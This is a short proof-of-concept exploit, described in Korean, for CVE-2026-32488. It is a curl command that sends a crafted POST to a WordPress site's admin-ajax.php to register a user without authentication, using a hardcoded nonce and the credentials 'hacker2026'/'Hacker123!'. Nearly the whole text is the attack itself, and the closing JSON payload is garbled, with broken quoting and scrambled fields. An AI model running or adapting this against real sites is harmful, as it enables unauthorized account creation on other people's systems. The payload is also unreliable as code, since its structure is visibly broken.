
admin-ajax.php에 대한 조작된 POST 요청을 통해 WordPress 사용자 등록을 대상으로 하는 CVE-2026-32488용 개념 증명 익스플로잇으로, 인증되지 않은 사용자 생성을 가능하게 합니다.
CVE-2026-32488
$NONCE = "c82a4f80ba"
curl.exe -s -X POST "http://localhost/wp-admin/admin-ajax.php" -d "action=user_registration_user_form_submit"
-d "ur_frontend_form_nonce=$NONCE" -d "form_id=6"
-d "form_data=[{"field_name":"user_login","value":"hacker2026","field_type":"text"},{"field_name":"user_email",":",":"},{":",":",":"}]"
"value"field_type"email"field_name"user_pass"value"Hacker123!"field_type"password